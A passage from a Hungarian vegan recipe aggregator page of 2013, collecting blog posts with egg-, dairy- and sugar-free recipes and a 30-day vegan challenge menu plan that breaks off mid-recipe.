jelentősebb mennyiségben.    Mindezen anyagoknak köszönhetően javítja az immunrendszeri ellenálló-képességet, véd a szív- és érrendszeri megbetegedésekkel szemben. Élettani hatásait tekintve igen fontos rosttartalma - héjában például rengeteg cellulóz van - , ami jól megmozgatja a beleket, így ajánlható székrekedés ellen. Szilvás lepény Hozzávalók: 250 g teljeskiőrlésű tönköly liszt 250 g fehér tönköly liszt 100-150 g darált dió, vagy mandulaliszt ( nem feltétlenül szükséges) 150 g kókusz cukor ( annak függvényében, hogy ki mennyire édesen szereti) 400 ml növényi tej 5-6 evőkanál kókusz olaj 1 csomag foszfátmentes sütőpor 1/­­2 citrom reszelt héja 250 g magozott kék szilva 1 kk őrölt fahéj 3 evőkanál kókusz cukor Egy keverőtálban először a száraz, utána a nedves hozzávalókat összekeverjük, majd robotgép segítségével tovább keverjük. Kiolajozott sütő formába öntjük, lehet kapcsos torta forma is: kb. 30 cm átmérőjű. A kimagozott szilvákat őrölt fahéjjal elkevert kókusz cukorba hempergetjük, majd  lisztben is meghempergetjük, (hogy a sütemény tetején maradjanak)  és tetszetősen a tészta tetejére szórjuk. Majd előmelegített sütőben 180 fokok 40 - 45 percig sütjük. Mielőtt kivennénk a sütőből végezzünk szúrópróbát!   Fittanyuka

Vegán (tej-tojás-margarinmentes) korpás keksz-ajánló

2013. augusztus 21. Mindennapi ételeink 

Vegán (tej-tojás-margarinmentes) korpás keksz-ajánlóNagy fejtörést szokott okozni, hogy kekszes süteményeket, desszerteket hogyan készítsem el, milyen kekszet használjak, ami finom, nem túl drága, és tej-tojás-margarinmentes, és nem fehér liszttel, hanem korpással vagy barna liszttel készül + ha lehet, barna cukorral, inulinnal dúsított.  Jó hírem van: nemrég fedeztem fel az alábbi céget, amely Spanyolországból, Olaszországból, Belgiumból és Csehországból importál termékeket, amelyek hasonló opciókkal rendelkeznek :-). És nem csak bioboltokban vagy a Sparban, Intersparban lehet kapni (kicsit drágábban), hanem van mintaboltjuk is, Budapesten (Ajándék Kuckó ajándék-és édességbolt, 1035 Budapest, Szentendrei út 6.). Itt első kézből lehet megvásárolni a termékeket. Most egy korpás kekszet mutatok be, melyet az üzletben tett látogatásunk kapcsán kaptunk ajándékba :-) Hamarosan a többi termékről is írok. :-) Santiveri Maria cukormentes korpás omlós keksz - Korpás búzaliszttel készült, élelmi rostban gazdag -Cukor hozzáadása nélkül készült, természetes módon előforduló cukrokat tartalmaz.  - Maltittal édesítve - Folsavval dúsított - Cukorbetegek is fogyaszthatják - Laktóz-tejtermék-és tojásmentes.   Még csak önmagában, illetve lekvárral és házi nutellával fogyasztottuk, de nagyon jó lehet vegán tortaalapnak is. Hamarosan készítek valami finomságot is ezzel a keksszel. 

Tönköly - Zablisztes " túrókrémmel" töltött Palacsinta

2013. július 20. Fittanyuka Blog 

Tönköly - Zablisztes Ha hétvége akkor nálunk palacsinta! Mind közül nekem ez a kedvencem: a " túrókrémmel" töltött, amely tej,-laktóz,-tojás,-cukormentes és könnyen emészthető. A könnyű emészthetőség titka nemcsak az értékes, rostdús lisztek miatt van, hanem a kisütéséhez nem használok hidrogenizált zsírokat, hanem a kókusz olajat amely színtelen, szagtalan, nehezebben, magasabb hőfokon ég csak és ennek köszönhetően a lakásban nem érződik a tipikus "palacsintát sütünk" szag. Sokan kértétek a receptet a Fittanyuka /­­ facebook oldalon, a recept pofon egyszerű: Palacsinta tészta kb: 15-20 db Hozzávalók: 300 g világos tönköly liszt 200 g zabpehely liszt 1-2 evőkanál folyékony stevia - Cukvia, vagy nyírfacukor késhegynyi szódabikarbóna 1/­­2 citrom reszelt héja 1 l víz kevés kókusz olaj a kisütéséhez A hozzávalókból palacsinta tésztát kavarunk, ha szükséges adhatunk hozzá kevés vizet és a hagyományos palacsintához  hasonlóan egyenként kisütjük őket. Túrókrém Hozzávalók: 300 g natúr tofu 2- 3 evőkanál folyékony stevia - Cukvia vagy nyírfacukor 200 ml kókusz tejszín 1 kk Bourbon vanília 1 citrom reszelt héja 1/­­2 citrom leve A tofut összemorzsoljuk és botmixer segítségével a többi hozzávalóval krémesre turmixoljuk. Aki valamilyen oknál kifolyólag nem fogyaszt tofut, elkészítheti kölesből is a krémet: 100 - 150 g kölest megfőz háromszoros mennyiségű vízben, miután kihűlt  a fenti hozzávalókkal összedolgozza a kézi botmixer segítségével. A reformélelmiszer alapanyagokat a Jó egészséget! webáruházban tudja beszerezni. Fittanyuka

Erdei gyümölcsös, amarántos reggeli

2013. július 5. Vegagyerek 

Erdei gyümölcsös, amarántos reggeli Egy nagyon gazdag, tartalmas reggeli, amit nyáron készíthetsz sok friss finom gyümölccsel, sőt valójában bármilyen gyümölccsel! Magas fehérjetartalmú amaránt, többféle olajos mag, friss gyümölcs, nyamm!:) Garantáltan nem leszel tőle gyorsan éhes!;) Erdei gyümölcsös, amarántos reggeli Elkészítési idő: max. 10 perc Hozzávalók 2 főre: 30 g pattogatott amaránt 50 g cukormentes kukoricapehely 70 g zabpehely 30 g pirított mandula 40 g goji bogyó (elhagyható) 40 g aszalt vörös áfonya (nem cukrozott!) 30 g dió 1 ek lenmagpehely szezon gyümölcs tetszés szerint 400 ml zab/­­ rizstej Az összes hozzávalót a gyümölcs kivételével egy nagy tálban összekeverjük, mély tányérba, tálkába adagoljuk, leöntjük a növényi tejjel és megszórjuk a gyümölccsel.

Cukormentes rebarbarás pite

2013. június 8. Fitt Nők 

Cukormentes rebarbarás piteElőször készítettem életemben ilyen rebarbarás pitét az almás pite mintájára, annak a receptjét reformosítva. Nagyon finom lett, ajánlom bátran. A rebarbarát lehet más gyümölcsökkel is párosítani, úgy különlegesebb ízhatásokat érhetünk el. Hozzávalók: 50 dkg teljes kiőrlésű tönkölyliszt, kb. 15 dkg kókuszzsír, kb. 1,5 dl sűrűbb mandulatej (vagy egy kis pohár tejföl), 3 evőkanálnyi őrölt lenmag (ez a tojáshelyettesítő), csipet foszfátmentes sütőpor, kb. 10 dkg őrölt xilit (nyírfacukor) + 1-2 kiskanálnyi stevia por ízlés szerint. Töltelékhez: rebarbara, xilit Elkészítés: A pitetésztához a hozzávalókat egyszerűen összegyúrjuk, majd két részre osztjuk és kinyújtjuk őket. Az alsó rétegre rátesszük az előzőleg kissé megfőzött és héjától megtisztított rebarbara szárakat, megszórjuk xilittel ízlés szerint, majd rátesszük a pitetészta tetejét. Megszurkáljuk villával és sütőben addig sütjük, míg készen nem lesz. A tetejét fahéjjal ízesített őrölt xilittel szórtam meg. Jó étvágyat!  

Cukormentes epres-rebarbarás lekvár

2013. június 1. Fitt Nők 

Cukormentes epres-rebarbarás lekvárHa az eper szerelembe esik a rebarbarával,  abból csak finom sülhet ki. Ma egy cukormentes lekvár született, melyet tartósítószer nélkül készítettem. Nagyon finom lett, elkészítése is nagyon egyszerű és gyors. Hozzávalók ízlés szerinti mennyiségben: eper, rebarbara szár, xilit és stevia crysa nova por édesítésként, agar-agar por zselésítőként Elkészítés: Az epret megmossuk, és elfelezzük, majd egy lábosba tesszük. A rebarbara héját lehúzzuk, majd ezt is kis méretű darabokra vágjuk, és ez eperhez adjuk. A lábosba teszünk kis mennyiségű vizet, és elkezdjük benne főzni az epret és rebarbarát. Ha már puha minden, botmixerrel pépesítjük. Még pépesítve is forraljuk egy ideig, majd hozzáadjuk az édesítésnek szánt xilitet és/­­vagy stevia port, végül a mennyiségnek megfelelő agar-agar port. (Az agar-agar por adagolása az üvegen megtalálható). Így is még keverünk egyet rajta a botmixerrel, hogy ne legyen csomós, majd tisztára mosott üvegekbe töltjük. Mivel nincs benne tartósítószer sem, kihűlés után hűtőben tárolandó és rövid időn belül elfogyasztandó. Jó étvágyat! Megjegyzés: Az agar-agar por egy növényi zselatinhelyettesítő anyag, zselés hatást lehet vele elérni. Bioboltokban kapható.

Nutellás kalács

2013. május 23. BioBrigi 

Nutellás kalács Már ha azzal kenjük meg, és nem karobella krémmel, vagy házi mogyorókrémmel. Ez utóbbiról még nem írtam bejegyzést, de majdcsak odajutok, ha egyszer lemérem, miből mennyi kerül bele. Zizi és Dulmina is készített már, de Nóri is. Hozzám az utóbbi változat áll legközelebb, de a csoki karob porral helyettesített. A kalács tésztája nagyon egyszerű. Minden ilyesfélénél a kenyér receptből indulok ki, de a zsömléhez, kalácshoz 10 dkg liszthez 60 ml víz helyett 10 ml-rel több kerül, és persze több élesztő, víz helyett pedig szójatej. Érdemes esetleg tönkölylisztet használni, mert lágyabb tésztát kapunk. Hozzávalók: 60 dkg liszt (2/­­3 teljes kiőrlésű, 1/­­3 fehér liszt) 420 ml szójatej 3 ek gyümölcscukor 3 ek olivaolaj 2 dkg élesztő 1 rúd vanília kikapart belseje 1 kk só Tölteléknek: mogyorókrém A tetejét megkenni: 1 ek olivaolaj, 1 ek tej és 1 kk cukor keveréke A tészta összes hozzávalóját kenyérsütő gépben megdagasztatjuk, vagy kézzel gyúrjuk. Azután fél órát pihentetjük. A tésztát 3 részre osztjuk, egyenként kinyújtjuk ujjnyi vastagra, és vékonyan megkenjük mogyorókrémmel. Feltekerjük. A tekercseket összefonjuk, a végüket behajtjuk a kalács alá. A kanál tejben elkeverjük a gyümölcscukrot, majd hozzáadjuk az olajat, és ezzel megkenjük a kalács tetejét. Zsírpapírra tesszük egy nagyobb tepsibe. Újabb fél óra kelesztés után bő 40 perc alatt közepes lángon sütjük.

Húsvéti Receptajánló

2013. március 24. Fittanyuka Blog 

Húsvéti Receptajánló     Hús, tojás, lisztes ételek, cukor, alkohol általában ezek szoktak szerepelni sok ünnepi asztalon - de ezek az édes kis bűnök a testnek nem tesznek túl jót. Ne feledjétek az ünnepek alatt is ehetünk finom falatokat úgy, hogy szervezetünket ne terheljük le túlságosan a savas melléktermékekkel!    Tipp: Ha hosszú távon betartjátok a 80/­­20 -as szabályt, vagyis 80%-ban bázikus ételeket: sok zöldséget, jó zsírokat, teljes értékű gabonákat fogyasztotok és csak 20%-ban esztek közepesen savasító ételeket, akkor nem kell lelkifurdalás gyötörjön, ha az ünnepek alatt ( 20%-ban) lecsúszik valami nem igazán lúgosító fogás. Ugyanis a minőségileg jól táplált szervezet könnyen túllendül ezeken a kis bűnökön, ha utána újra visszatértek a 80/­­20-as táplálkozásra!   Egy kis segítség nektek Húsvétra, hogy könnyebb legyen szelektálni a receptek között! Tudtam volna még egy párat beilleszteni a kollázsba, de ez is bőven elég, ha mondjuk mindet elkészítitek:).  Az én ünnepi menüm még nem állt össze teljesen, amit viszont biztosan elkészítek az a Tojáskrém és a Répa kuglóf! Nálunk a sonka csak a férjem kedvéért szokott szerepelni az ünnepi asztalon, a tojások csak szimbólumok, ilyenkor szoktam még gabona gömböcöt, szeletelni és tálalni és anyukám süti mindig a fonott kalácsot tönköly lisztből, amelynek a receptjét alább megtaláljátok. Jó készülődést kívánok nektek a jövő hétre!   1. Citrom torta ( Tej,-tojás,-cukormentes),    2. Nyuszis aprósüti ( nemcsak) gyerekeknek,  3. Répa Kuglóf: (Tej,-tojás,-cukormentes),  4. Spenótos Pasqualina,    5. Ünnepi foszlós kalács: Tej,-tojásmentes. - nádcukorral,    6. Erdei Gombákkal töltött tejszínes karaláb, széles metélttel,    7. Spenótos Gödöle,    8. Uborkás avokádó krém, zsenge retekkel,  9. Tojáspástétom kapribogyós mártással:    Fittanyuka

Agyfényező golyók aszalt gyümölcsökből, cukormentesen

2013. március 20. Vegagyerek 

Agyfényező golyók aszalt gyümölcsökből, cukormentesen  Megjelent egy kedves régi blogtárs, Gréta legújabb vegán szakácskönyve, mely életmód- és szakácskönyv is egyben. Igényes kivitelezésű könyvről van szó, és bár a könyvet még nem láttam, de ahogy Gréta korábbi munkáit ismerem, biztosan a tartalom is ilyen!:-) 150 egyszerű, gyors és ínycsiklandó recept, megannyi életmód-, és táplálkozási tipp, hogy kívül-belül szép, egészséges és kiegyensúlyozott legyél! A gyönyörű, igényes, színes kötet vásárlói ajándékként egy e-book kiegészítést, valamint kötetenként egy félórás személyes életmód tanácsadást kapnak ajándékba Gréta Konyhája Vegán Életmód-, és Szakácskönyv rendelhető az info@vipmedia.hu címen!  2013. március 28-án kóstolóval egybekötött könyvbemutatón vehettek részt Budapesten! Ez a recept már ebből a könyvből származik!   Agyfényező golyók: 1 bögre darált dió 1 bögre kimagozott datolya (előző este beáztatva) 1 ek karob vagy kakaópor 1tk fahéj 2 ek kókuszreszelék (opcionális) 1 ek kókuszolaj(opcionális) Egy aprítóba tesszük és és masszává darálunk. Kezünkkel golyókat formázunk Forrás: Gréta konyhája vegán szakácskönyv

Málnás-amarántos szójajoghurt pirított kókusszal

2013. március 7. Vegagyerek 

Málnás-amarántos szójajoghurt pirított kókusszal Reggelire ettük ezt a szépséget a 30 NAPOS VEGÁN KIHÍVÁS egyik napján, ami nekem nagyon ízlett, a gyerekek nem igazán voltak bizalommal az irányába, illetve a férjem annyit mondott, hogy tejes joghurttal és amaránt nélkül biztos finomabb lett volna!:-))) Érdemes fogyasztásnál összekeverni a rétegeket, akkor még jobban érvényesül a telje sízhatás!:-) Málnás amarántos szójajoghurt pirított kókusszal Elkészítési idő: kb. 10 perc Hozzávalók (2 főre): 60 g puffasztott amaránt 260 g natúr, cukormentes! szójajoghurt 4 ek. agave szirup 200 g málna (fagyasztott) 1 késhegynyi őrölt vanília 10 g kókuszreszelék Keverjük össze az amarántot és a szójajoghurtot, édesítsük 2 ek. agave sziruppal. Keverjük el az agave szirupot a vaníliával és öntsük a málnára, finoman keverjük össze! A kókuszreszeléket pirítsuk meg zsiradék nélkül kb. 3 percig egy serpenyőben, majd édesítsük 1 ek. agave sziruppal. A málnát régetezzük az amarántos joghurttal egy pohárba, a tetejére szórjuk a kókuszt! Forrás: Attila Hildmann: Vegan for Fit

Vegán rántotta

2013. március 5. La Veganista 

Vegán rántottaHa finom, egyszerűen és gyorsan elkészíthető reggelire/­­vacsorára vágysz, akkor feltétlenül próbáld ki a vegán rántottát. A receptet néhány hónapja egy angol vegán oldalon találtam. Szerelem volt első sütésre. Azóta hetente egyszer biztosan az asztalra kerül különféle variációban. Bármilyen, ízlésünknek megfelelő fűszer és zöldségkombót,  használhatunk a rántottához, csak a fantáziánk szabhat határt. Az alábbi recept csak egy a sok közül, két főre: Hozzávalók: 1 csésze (3dl-es) csicseriborsó liszt olívaolaj a sütéshez 1 teáskanál kurkuma 1 teáskanál curry por 1 teáskanál őrölt kömény só ízlés szerint (használható fűszersó is) + annyi cukormentes, ízesítés nélküli rizstej vagy víz, amennyitől palacsintatészta állagú lesz a matéria Belevalók: 1-2 gerezd fokhagyma (apróra vágva) 1/­­2 chili (apróra vágva), vagy chilipor (ha szereted az erősebb ízeket) 1 db közepes vöröshagyma 1-2 db paradicsom 1/­­2 csésze zöldborsó 1/­­2 kaliforniai paprika (vagy amilyen kéznél van)  Így készül a rántotta A felaprított zöldségeket (kivétel zöldborsó) egy-két kanálnyi olívaolajon néhány percig előpirítom. A chilit és a fokhagymát csak a legvégén dobom bele, mert ezek hamar megpirulnak. Amíg a zöldségek pirulnak, összekeverem egy tálkában a csicseriborsólisztet, a fűszereket és a rizstejet. Miután a zöldségek megpirultak, ráöntöm a tésztát, és közepes lángon 8 percig sütöm, amíg a tészta széle világosbarnára pirul. Ezután megfordítom, és a másik oldalát is megsütöm 6-8 perc alatt. Kísérletezz más zöldségekkel is. Remekül fel lehet dobni babbal, spenóttal, répával, gombával, padlizsánnal, bármivel, ami otthon van. A fűszerezés terén is érdemes kipróbálni más variációkat. Nagyon szeretem a csípősebb vonalat képviselő tandoor masalát, de a garam masala fahéjas ízvilága is jól passzol  hozzá. A legjobb viszont az, hogy glutén érzékenyek is fogyaszthatják ezt a finomságot!

Reform linzer teljes kiőrlésű lisztből

2013. március 3. Fitt Nők 

Reform linzer teljes kiőrlésű lisztbőlLinzert még talán nem is készítettem reform módon,  így most kipróbáltam. Finom lett, kicsit porhanyósabb, mint a hagyományos változat, hiszen nincs benne tojás, és a zsiradék sem vaj vagy margarin, hanem kókuszzsír, és ezek a tényezők teszik kicsit szárazabbá, porhanyósabbá a tésztát. Viszont érdemes kipróbálni! Hozzávalók a tésztához: 20 dkg teljes kiőrlésű tönkölyliszt, fél tasak foszfátmentes sütőpor, 10 dkg nyírfacukor (xilit) (vagy 5-5 dkg méz-xilit keverék), fél citrom leve, kb. 3 lapos evőkanálnyi lenmag (pl.  sárga arany lenmag), kb. fél dl víz Tészta elkészítése: A teljes kiőrlésű tönkölylisztet összekeverjük a sütőporral, majd a többi alapanyagot hozzáadjuk, és alaposan összegyúrjuk. A kókuszzsírt jobb, ha felhasználás előtt egy picit meglangyítjuk, így kézzel könnyebben eldolgozható. Az elkészült tésztát tk. liszttel lisztezett gyúródeszkán kinyújtjuk, kiszaggatjuk. A diósakhoz a felső részt megkenjük pl. szőlőmagolajjal, és durvára darált dióba forgatjuk, és dióstul megsütjük. Ha megsült, kivesszük a sütőből, kihűtjük, és aszalt áfonya lekvárral összeragasztjuk a két felet. Aszaltáfonya lekvár: aszalt áfonyát vízzel összeturmixolunk, hogy lekvársűrűségű masszát kapjunk, és már készen is van a tartósítószermentes lekvárunk. A kakaósakhoz a cukormentes csokimázt az alábbi módon készítjük: kb. 3-4 dkg kakaóvajat meglangyítunk lassú tűzön, folyékonnyá olvasztjuk, hozzákeverünk édesítésnek egy kis stevia port (Stevia Crysanova), egy kis kakaóport, és belemártjuk a linzer felső részeit. Mivel porózus tészta, egy picit magába fogja szívni. Kókuszreszelékkel meghintjük a tetejét. Frissiben is tálalható, nem kemény. Jó étvágyat!

Chilis, citromos pirított tofu leveleskellel + a harmadik hét cukor nélkül

2013. február 25. Zizi kalandjai 

Chilis, citromos pirított tofu leveleskellel + a harmadik hét cukor nélkül   Harmadik hetünk is könnyen telt cukor és édességek nélkül. Néha azért belemarkoltam a mazsolás zacskóba  (I. nem igazán szereti a mazsolát) és aszalt fügét is ettünk néhány darabot. A legjobban az hiányzik, hogy készíthessek végre valamilyen édeset. Még nem is feltétlen a sütés hiányzik, ugyanis jó néhány nyers édesség receptje vár kipróbálásra és először ezeket szeretném megvalósítani. Na igen, őszinte leszek... azért egy puha, finom croissant-t is be tudnék már nyomni habos vegán kakaóval vagy cappuccinoval. Főleg úgy, hogy I. beígért nekem egy ilyen reggelit, ha végzünk a cukormentes kihívással. Lehet, hogy ez az álom már pénteken meg is valósul? :) A sós ételek tekintetében mindenfélét eszünk. Ha van időm, készítek valami újat, ha nincs I. gyorsan összedob egy isteni paradicsomos-bazsalikomos tésztát vagy pirítós kenyeres (napraforgó krémmel megkenve) hatalmas adag salátás vacsorát. Ezek az ő reszortjai. Ő a zöld salátakészítő a családban, nem én. :) Ez a chilis, citromos, fűszeres pirított tofu még korábban készült, de egy nagyon finom, tápláló vacsora kerekedett belőle. Könnyű is elkészíteni... a sütőben elkészül a tofu és a leveleskel (ha nem találtok leveleskelt, helyettesítsétek kelkáposztával), a tűzhelyen pedig megfőzzük hozzá a köretet. Mi quinoa-val ettük, de bármilyen más gabonával, salátával, rizstésztával el tudom képzelni. A kihívás szabályai továbbra is ugyanazok: aki a nyereményjátékban is részt kíván venni, azoktól feltétlen várom a néhány soros beszámolót komment formájában itt a bejegyzés végén (csak az kerül bele a kalapba, aki mind a négy heti beszámolóhoz ír néhány sort vagy blogbejegyzést). Aki pedig használ Instagramot, az a kihívás idején februárban címkézze fel az általa elfogyasztott ételek képeit az alábbiak szerint: #februaricukormenteskihivas. Lesz egy jó kis online albumunk! Akik a harmadik cukormentes hétről beszámoltak: - Orsi - Wannabe Chef - Boglárka - Önismereti kalandtúra Chilis, citromos pirított tofu leveleskellel Hozzávalók 2 főre: - 300 g tofu, felesleges víz kipréselve belőle, majd kockákra vágva - 1 közepes csokor leveleskel, szárak eltávolítva, a levelek falatnyi darabokra tépkedve - 1 db citrom, reszelt héja és kifacsart leve - 2 gerezd fokhagyma, szeletelve - 2 ág friss rozmaring, levelei felaprítva - 3-4 ág friss kakukkfű, levelei felaprítva - 1 teáskanál chili pehely (vagy friss chili) - 3-4 evőkanál extra szűz olívaolaj - só, bors - 1/­­2 bögre főtt quinoa Melegítsük elő a sütőt 180 fokra. Egy tepsire tegyünk sütőpapírt. Tegyük egy mozsárba a citromhéjat, a fokhagymát, a chili pelyhet, a rozmaringot, a kakukkfüvet, valamint a sót és a borsot és törjük ezt a fűszeres keveréket minél apróbbra. Adjuk hozzá az olívaolajat és citromlevet és jól keverjük el. Egy tálban keverjük össze a tofu kockákat a citromos fűszer felével és tegyük a tepsire. Süssük 180 fokon kb. 20 percig, amíg átpirulnak. Tegyük a megsült tofu kockákat egy tálba. Ezután a leveleskel darabokat is keverjük össze a megmaradt citromos fűszerrel. Helyezzük a leveleket a tepsire és pirítsuk meg 160 fokon kb. 5-8 perc alatt. Tálaljuk azonnal a pirított tofut és leveleskelt a megfőtt quinoa-val.

A 30 NAPOS VEGÁN KIHÍVÁS - 1-7. NAP MENÜTERVE

2013. február 22. Vegagyerek 

A 30 NAPOS VEGÁN KIHÍVÁS - 1-7. NAP MENÜTERVE A 30 NAPOS VEGÁN KIHÍVÁS 1-7. NAP MENÜI 1.   NAP Reggeli: - gyümölcsturmix - egy marék dió, VAGY  1-2 szelet olajos mag - krémes pirítós (mandulakrém, vagy kesudiókrém, vagy amit szeretsz!:-) - friss gyümölcs (ezt áttolhatod akár tízóraira is) Ebéd: - teljes kiőrlésű spagetti (kb. 150g/­­fő), vagy teljes kiőrlésű penne tészta paradicsomos, spenótos, fokhagymás szósszal Vacsora: - saláta , melybe kerülhet: zöld leveles salátafélék, reszelt, vagy aprított sárgarépa,  valamilyen babféle (kb. 100 g/­­ fő), pl. kidney bab, fekete, vagy pinto bab, és egy könnyed olívás-citromos öntet Ital: 2 l szénsavmentes ásványvíz + 1,5 l zöld tea Infók a menühöz: Gyümölcsturmix:   http:/­­/­­www.fittnok.hu/­­erdei-gyumolcsos-turmix -          így a tél végére kellően megunjuk az alma-banán-narancs variációt, úgyhogy előkerülhetnek már időnként a fagyasztott gyümölcsök is. Pl. készítsd el ezt az erdei gyümölcsös turmixot (méz helyett agave sziruppal!!) úgy, hogy a turmixolás előtt adsz hozzá egy evőkanál őrölt lenmagot és egy evőkanál olajos mag krémet (pl. mandulakrém, vagy kesudiókrém). Más gyümölccsel is helyettesítheted! -          zöldturmix is mehet, ha Neked az jön be jobban! Sokfélét találsz Gitta blogján! Pl. kezdésnek akár ezt a petrezselymes zöld turmixot !   http:/­­/­­gittarawfood.blogspot.hu/­­2010/­­01/­­petrezselymes-zold-turmix.html Ebéd:  egy kis olajon pirítsd meg egy picit az összeszúzott 1-2 gerezd fokhagymát, dobd rá a leveles spenótot (fagyasztott is lehet, ha nem kapsz frisset!), öntsd fel aprított, dobozos/­­ konzerv paradicsommal és főzd egy ideig! Só, bors, öntsd rá a tésztára és kész is!:-) Vacsora : ha a babot otthon főzöd, ne felejtsd el beáztatni előző este! Mivel a héten többször is lesz babféle, akár nagyobb adagot is megfőzhetsz, majd lefagyaszthatod! Ha konzervet használsz, ügyelj rá, hogy az összetevők között a címkén csak víz, só és a babféle szerepeljen! 2.   NAP Reggeli: - banánhabos, kókuszos amarántkása http:/­­/­­www.vegagyerek.hu/­­2008/­­02/­­bannhabos-kkuszos-amarant-ksa-vegn.html Ebéd: - egyszerű tészta-, vagy bab-saláta : keverj össze egy adag főtt babfélét, vagy kifőzött teljes kiőrlésű tésztát nyers zöldségekkel (sárgarépa, fokhagyma, zellerszár, vagy zellercsíkok, kaliforniai paprika). Adj hozzá egy kis olívaolajat, sót, borsot és esetleg kis citromlevet. Vacsora: - tepsiben sült zöldségek : különféle zöldségek, amiket találsz a hűtőben, felaprítva (szezonálisak mehetnek bele nyugodtan, sütőtök, cékla, káposztafélék, répa, stb., figyelj rá, hogy nagy kockákra vágd, ne süljön szét!:-) meglocsolva kis olívaolajjal, hozzá só-bors, és süsd meg a sütőben! Salátát nyugodtan ehetsz hozzá! Ital: 2 l szénsavmentes ásványvíz + 1,5 l zöld tea 3.   NAP Reggeli:  1-2 szelet pirított teljes kiőrlésű kenyér valamilyen olajos mag krémmel  (pl. mandula, kesudió, szezám), és esetleg cukormentes lekvárral  (pl. bio cukormentes szilvalekvár, vagy bio agave sziruppal édesített gyümölcslekvár); friss gyümölcs (ezt áttolhatod uzsonnára is) Ebéd: paradicsomos szendvics:  2 szelet pirított barna kenyér közé tegyél felszeletelt paradicsomkarikákat, egész bazsalikom leveleket, zöld leveles salátát, csírákat és megkenheted akár tojásmentes kölesmajonézzel is.   http:/­­/­­www.vegagyerek.hu/­­2011/­­01/­­tofusalatas-szendvicskrem-es.html Ha gazdagabban szeretnéd megpakolni, akkor egy-két szelet füstölt tofut piríts meg kis olajon, vagy grillezd meg,  pici szójaszósszal ízesítve, és azt is tedd a kenyérbe húspótlóként. Vacsora:  kis olívaolajon piríts meg egy kis vöröshagymát, kaliforniai paprikát, gombát. Só, bors, kis őrölt kömény, őrölt koriander (csili, aki szeretiJ), és keverj hozzá főtt fekete babot (kb. 100 g /­­fő). Fogyassz hozzá friss avokádó szeleteket, de készíthetsz akár avokádókrémet  is, ha ízesebben szeretnéd enni az avokádót (az avokádót kis citromlével, sóval, borssal pürésíteni). Ital: 2 l szénsavmentes ásványvíz + 1,5 l zöld tea 4. NAP Reggeli : almás zabkása . Főzz meg víz (kb. 300 ml) + növényi tej (150 ml) keverékében apró szemű zabpelyhet puhára, mazsola is mehet bele ízlés szerint. Amikor elkészült, reszelj bele almát, és tegyél hozzá egy evőkanál darált lenmagot + egy kávéskanál őrölt szezámmagot, őrölt fahéjat ízlés szerint. Pici bio agave szirup is mehet hozzá, ha igényled az édesebb ízt, de a mazsola és az alma magában is édesít.:-) Ebéd : polenta   http:/­­/­­www.vegagyerek.hu/­­2010/­­01/­­babos-kukoricas-teli-egytal-polentaval.html     kis olívaolajon pirított kelbimbóval  + só-bors   (ha félbevágod a kelbimbókat könnyebben pirul), friss salátával. Vacsora : csicseripástétom (a recept jön!J) friss zöld mártogatóssal. 5. NAP Reggeli: gyümölcs olajos mag krémmel  (mogyoró, vagy mandula, vagy kesudiókrém). Vágj fel almát, körtét, vagy banánt szeletekre, és mártogasd a krémbe. Ha nem elég laktató Számodra, akkor ehetsz 1-2 szelet teljes kiőrlésű kenyeret, amire rákened a krémet és kis cukormentes szilvalekvárt, vagy agave szirupos lekvárt. Ebéd : csicseriborsós quinoa  (vagy barna rizs, vagy árpa). Főzz meg egy adagot a kedvenc gabonádból (kb. 100 g szárazon/­­fő) és keverj hozzá főtt kukoricát, aprított/­­durvára reszelt nyers sárgarépát, felkockázott paradicsomot, kis zúzott fokhagymát, friss bazsalikomot, vagy petrezselyemzöldet, kis olívaolajat és citromlevet, sót-borsot. Végül adj hozzá némi főtt csicseriborsót, vagy más babfélét. Vacsora:  tökmagpástétom friss zöldség szeletekkel, csíkokkal http:/­­/­­www.vegagyerek.hu/­­2010/­­01/­­tokmagpastetom.html   6. NAP Reggeli: amarántos teljes kiőrlésű mini palacsinták friss gyümölccsel Ebéd: mediterrán kölestál Vacsora: gyors vöröslencse-leves Recept hozzá:   http:/­­/­­hobbifozocske.blogspot.hu/­­2008/­­01/­­gyors-vrslencseleves.html Amarántos teljes kiőrlésű mini palacsinták (kb. 20 perc) Hozzávalók 2 főre (6 db mini palacsintához): 60 g teljes kiőrlésű liszt 140 ml növényi tej (zabtej, vagy rizstej) 20 g agave szirup 1 csapott teáskanál foszfátmentes borkő sütőpor 1/­­2 teáskanál őrölt vanília 30 g puffasztott amaránt dió olaj, vagy bio kókuszzsír a sütéshez Elkészítés: az amaránt kivételével keverjük habverővel  simára az összes hozzávalót, és a végén adjuk hozzá az amarántot. Kenjünk ki olajjal vékonyan egy serpenyőt, tegyünk bele 1-2 evőkanál palacsinta tésztát, és süssük oldalanként kb. 4 percig. Csorgassunk rá vékonyan agave szirupot, és fogyasszuk friss gyümölccsel! Forrás: Attila Hildmann: Vegan for Fit Mediterrán kölestál (kb. 30 perc) Hozzávalók 2 főre: 250 g köles 250 ml víz só 1 fej vöröshagyma 1 cukkini 1/­­2 padlizsán 1 sárgarépa 4 ek. olívaolaj 80 g paradicsompüré 2 teáskanál szárított oregánó bors csírák 40 g pirított mogyoró Elkészítés: A jól megmosott kölest a vízzel és 1/­­2 tk. sóval feltesszük főni, forrás után kb. 20 percig. A hagymát felaprítjuk, a cukkinit és a padlizsánt felkockázzuk, a répát felszeleteljük. 3 ek. olívaolajat felforrósítunk és 5 percig pirítjuk benne a zöldségeket, majd hozzáadjuk a paradicsompürét, és az oregánót. 1 percig főzzük, sózzuk-borsozzuk. A kölest belekeverjük a pirított zöldségekbe, sózzuk-borsozzuk. A szárazon megpirított, felaprított mogyoróval és a csírákkal tálaljuk. Forrás: Attila Hildmann: Vegan for Fit 7. NAP Reggeli: szójajoghurtos - gyümölcsös kukoricapehely Összetevők: natúr szójajoghurt friss gyümölccsel, natúr kukoricapehellyel, kis puffasztott amaránttal, valamilyen aprított magfélével (pl. mandula, vagy dió) és egy evőkanál őrölt lenmaggal. Ebéd: fogyaszthatsz a tegnapi vöröslencse-levesből, ha maradt + quinoa-fasírt vegyes zöldsalátával http:/­­/­­www.vegagyerek.hu/­­2011/­­03/­­quinoa-fasirt.html DESSZERT!!!:-))),  vagy uzsonna 16h-ig: Kesudió - panna cotta eperöntettel Vacsora: zöldborsós, füstölt tofus saláta http:/­­/­­fittanyuka.blogspot.hu/­­2011/­­07/­­zoldborsos-fustolt-tofusalata.html Kesudió - panna cotta eperöntettel Hozzávalók (4 kis formához): 70 g kesudiókrém 2 késhegynyi őrölt vanília 60g agave szirup 1 g agar-agar 1 csipet só Öntet: 150g fagyasztott eper, vagy erdei gyümölcs keverék felolvasztva 30 ml agave szirup 1 